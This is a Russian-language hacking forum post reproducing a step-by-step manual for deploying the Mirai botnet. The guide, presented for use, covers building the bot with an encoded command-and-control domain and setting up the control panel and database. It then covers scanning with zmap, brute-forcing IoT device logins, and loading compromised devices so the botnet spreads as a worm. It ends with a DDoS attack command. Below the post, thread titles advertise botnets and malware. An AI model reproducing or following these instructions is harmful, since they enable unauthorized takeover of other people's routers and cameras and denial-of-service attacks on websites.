[Копипаст] Mirai ботнет (установка-настройка)

  • Автор темы T0pDro4eR
  • Дата начала
AmneziaWG
T

T0pDro4eR

Хз кто написал мануал первым, но думаю будет полезно прочесть и узнать.
русский мануал по установке Mirai.

Нам понадобится два VPS KVM сервера и домен. Виртуализация именно KVM, OpenVZ мимо в этот раз.
Сервера я беру здесь -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


На одном сервере будем ставить сам ботнет, на втором будем сканировать ботов. ( брутить )
ВАЖНО. Сервера должны быть на базе Debian 8, и иметь как минимум 1GB RAM.
Домен любой, без разницы.
Извините конечно, но рассказывать как прикрутить домен к VPS я не буду. Это не сложно, сами разберетесь.
Подключаемся к нашему серверу через PuTTY и начинаем.

# apt-get update -y
# apt-get upgrade -y
# apt-get install unzip gcc golang electric-fence screen sudo git -y
# apt-get install mysql-server -y
# apt-get install mysql-client -y
# apt-get install apache2 -y
При установке MySQL, нужно будет создать пароль для доступа к MySQL для root пользователя. Пароль нормальный придумаете, без всяких " qwerty "
Запишите куда нибудь, он нам еще будет нужен.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
# bash < <(curl -s -S -L

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

)
# gvm install go1.4
# gvm use go1.4 [--default]
# gvm install go1.4 -B
# gvm use go1.4
# export GOROOT_BOOTSTRAP=$GOROOT
# gvm install go1.5
# gvm use go1.5
# gvm install go1.8
# gvm use go1.8

После установки всех утилит, качаем исходники бота -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

и загружаем на сервер. Командой wget, или просто через программу WinSCP.
# unzip Mirai-Source-Code-master.zip
# cd Mirai-Source-Code-Master/mirai/tools
# gcc enc.c -o enc
# ./enc string vlmi.su ( свой домен пишем, который прикрутили к серверу ) и жмем Enter
Тут вы увидите такой текст -
XOR'ing 14 bytes of data...
\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22
14 - тут будет другая цифра у вас, так что не волнуйтесь, всё правильно.
Копируем весь этот текст.
Открываем через nano редактор, или же через WinSCP файл table.c который находится в папке mirai/bot
Должны увидеть это -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Строка add_entry(TABLE_CNC_DOMAIN - всё что в кавычках меняем на свой текст, который только что скопировали. Вместо " 30 " пишем свою цифру, которую тоже только что скопировали. Тоже самое делаем с строкой add_entry(TABLE_SCAN_CB_DOMAIN
Сохраняем, и закрываем редактор.
Идем дальше.
Открываем редактором файл mirai/cnc/main.go
Видим это -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


"127.0.0.1" меняем на "127.0.0.1:3306"
"password" меняем на наш MySQL пароль который вводили ранее. "
Сохраняем файл, и закрываем редактор.
Просто копируйте всю эту хуйню, рассказывать зачем это нужно, не буду -

# mkdir /etc/xcompile
# cd /etc/xcompile

# wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


# wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



# tar -jxf cross-compiler-armv4l.tar.bz2
# tar -jxf cross-compiler-i586.tar.bz2
# tar -jxf cross-compiler-m68k.tar.bz2
# tar -jxf cross-compiler-mips.tar.bz2
# tar -jxf cross-compiler-mipsel.tar.bz2
# tar -jxf cross-compiler-powerpc.tar.bz2
# tar -jxf cross-compiler-sh4.tar.bz2
# tar -jxf cross-compiler-sparc.tar.bz2
# tar -jxf cross-compiler-armv6l.tar.bz2

# rm *.tar.bz2

# mv cross-compiler-armv4l armv4l
# mv cross-compiler-i586 i586
# mv cross-compiler-m68k m68k
# mv cross-compiler-mips mips
# mv cross-compiler-mipsel mipsel
# mv cross-compiler-powerpc powerpc
# mv cross-compiler-sh4 sh4
# mv cross-compiler-sparc sparc
# mv cross-compiler-armv6l armv6l

# export PATH=$PATH:/etc/xcompile/armv4l/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin
# export PATH=$PATH:/etc/xcompile/i586/bin
# export PATH=$PATH:/etc/xcompile/m68k/bin
# export PATH=$PATH:/etc/xcompile/mips/bin
# export PATH=$PATH:/etc/xcompile/mipsel/bin
# export PATH=$PATH:/etc/xcompile/powerpc/bin
# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
# export PATH=$PATH:/etc/xcompile/sh4/bin
# export PATH=$PATH:/etc/xcompile/sparc/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/usr/local/go/bin
# export GOPATH=$HOME/Documents/go

# go get github.com/go-sql-driver/mysql
# go get github.com/mattn/go-shellwords
Заебался.

# cd Mirai-Source-Code-master/mirai
# ./build.sh debug telnet
# ./build.sh release telnet
# cd Mirai-Source-Code-master/mirai/release
# mv mirai* /var/www/html
# cd /var/www/html
# mkdir bins
# mv * bins/
# cd

Теперь MySQL.
# mysql -u root -p
Тут попросят пароль. Вводим пароль который ранее установили.
# create database mirai;
# use mirai
Теперь копируем весь текст от сюда -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

вставляем, и жмем Enter.
Копируем текст от сюда -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Вместо anna-senpai пишем свой логин. Любой. Так же и с myawesomepassword. Эти данные нам нужны будут для доступа в панель управления ботом.
Должно быть вот так - INSERT INTO users VALUES (NULL, 'pizdec', 'zaebalsjapisatj', 0, 0, 0, 0, -1, 1, 30, '');
Копируем, вставляем, жмем Enter.
Теперь можно выходить.
# exit
Уже почти всё.
# cd Mirai-Source-Code-master/mirai/release
# touch prompt.txt
# screen ./cnc
Должны увидеть надпись MySQL DB opened
Не закрываем эту сессию, открываем новую.

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

вместо vlmi.su пишем свой домен, и жмем Open.
Вводим логин и пароль, в моем случае это -
pizdec
zaebalsjapisatj
Всё, мы в панели управления ботом.

Теперь нам нужны боты. Тут всё просто, инсталлы никакие не нужны.
Настроим loader.
loader нужен для того чтобы ботов можно было бы добавлять с текстовых файлов. Допустим набрутили мы loT устройств ( роутеры, камеры, телефоны ) и чтобы их добавить в бот, нужен loader.
Так же loader это " червь "
Заразили одно устройство, и он дальше по цепочке будет брутить и добавлять ботов.
Подключаемся к нашему серверу через PuTTY и WinSCP.
С помощью WinSCP находим файл main.c в папке Mirai-Source-Code-master/dlr
Пишем IP нашего сервера как на скрине -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Запятые оставляем, так и должно быть. Сохраняем и закрываем.
Теперь с PyTTY заходим на наш сервак и пишем -
# cd Mirai-Source-Code-master/dlr
# chmod 777 *
# ./build.sh
# cd release
# mv dlr* ~/Mirai-Source-Code-master/loader/bins
Теперь открывем WinSCP и находим файл main.c в папке Mirai-Source-Code-master/loader/src
Меняем на свой IP как на скрине -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Сохраняем и закрываем.

Через PuTTY -
# cd Mirai-Source-Code-master/loader
# ./build.sh
С помощью WinSCP открываем файл scanListen.go который можно найти в папке Mirai-Source-Code-master/mirai/tools
Меняем на свой IP сервера -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Потом с PyTTY -
# cd Mirai-Source-Code-master/mirai/tools
# go build scanListen.go
Теперь у нас появился новый файл - scanListen ( без .go , просто scanListen )
scanListen нужно переместить в папку Mirai-Source-Code-master/loader
Просто с помощью WinSCP кидаем его в папку loader
Теперь проверим работает ли всё
# ./loader
Если видите то что на скрине, значит всё правильно -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Если возникают ошибки, пишите в тему, помогу.
Чтобы загрузить ботов с списка, кидаем текстовик в папку loader и набираем команду -
# cat list.txt | ./loader
Всё, все боты которых вы набрутили будут у вас, будут ложить сайты по вашей команде.
Я лично этот способ не использовал, нашел легче способ.

Тут нам нужен второй сервер. Так же на Debian 8.
# apt-get update -y
# apt-get upgrade -y
# apt-get install python-paramiko -y
# apt-get install zmap -y
zmap нам нужен для сканирования портов. Принцип работы как у KPortScan, только в 50 раз быстрей.
Копируем весь код от сюда -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

и сохраняем как scan.py
Тут вы можете добавить свои пароли, и логины -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Строку combo не трогаем!
Тут нужно прописать IP сервера на котором стоит бот -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Меняем всё, и сохраняем.
Файл scan.py кидаем в любое место на нашем сервере. На втором сервере, который чисто для сканирования, тот на котором бот не трогаем.
Нам нужны IP которые мы будем сканировать.
#zmap -p22 -o list.txt -B 100M ( можно и другие порты сканировать, я сканировал 22 или 23 всегда )
Все результаты будут в файле list.txt
После того как собрали IP ( чем больше тем лучше ) файл list.txt кидаем рядом к файлу scan.py и пишем -
# python scan.py list.txt 500
Всё, сидим и смотрим как растет наш ботнет.

Когда наберется хотя бы 200 ботов, можно запустить loader.
Для этого заходим на сервер где установлен ботнет и -
# cd Mirai-Source-Code-master/loader
# ulimit -n 9999999
# ./scanListen | ./loader
Теперь бот будет работать по принципу " червя " и добивать еще ботов.

Команда для DDoS атаки ( вводить нужно в панели управления ботнетом )
# http 1.1.1.1 350 domain=1.1.1.1 path=/ conns=999999999
 
  • Like
Реакции: fu11p0w3r и Псина1
A

ArhangelGabia

Интересно довольно таки, а как для новичка пока тугова-то)
 
Название темы
Автор Заголовок Раздел Ответы Дата
T "Слив схемы зароботка" Копипаст Способы заработка 15
D "Слив схемы" Копипаст Способы заработка 5
F Интересно Поднимаем свой IoT ботнет на основе Mirai Вирусология 4
C MIRAI BOT Spam/DDOS/Malware 16
Admin У ботнета Mirai появился мощный конкурент Новости в сети 0
Glods Исходный код популярного ботнета Mirai Spam/DDOS/Malware 2
Admin Операторы Mirai-ботнета атаковали антиспамерский проект Spamhaus Новости в сети 0
Support81 ФБР объявила охоту на владельца ботнет-сети из Молдовы Новости в сети 0
S Куплю приватный ботнет для DDOS атак Куплю/Продам 0
DOMINUS Правоохранители ликвидировали «самый опасный в мире» ботнет Emotet Новости в сети 0
NickelBlack AsaCUBE - Андроид ботнет для банкинга | Stealer | Balance Grabber | Built-In APK Builder Spam/DDOS/Malware 17
L Интересно ESET вскрыла ботнет для майнинга Monero из 35 тысяч устройств Новости в сети 0
S Пишу свой ботнет, что думаете? Другие ЯП 3
K Подниму ботнет на базе RAT никаких пробросов портов Ищу работу. Предлагаю свои услуги. 0
Y Написание уникального ПО/Формирование ботнет сети/Конкуренция в сети/Програмирование Ищу работу. Предлагаю свои услуги. 0
G Как построить свой личный ботнет и сколько это стоит Полезные статьи 0
Admin DeadCrush.Создаем ботнет из сайтов. Уязвимости и взлом 1
Admin DrDos. Создаем ботнет никого не взломав Полезные статьи 0
S Вредонос LockPoS для POS-терминалов распространяется через ботнет FlokiBot Новости в сети 0
I Как сделать лучший ботнет используя комбинацию утилит linux Полезные статьи 1
Admin Неизвестный ботнет ежедневно атакует пользователей в США Новости в сети 0

Название темы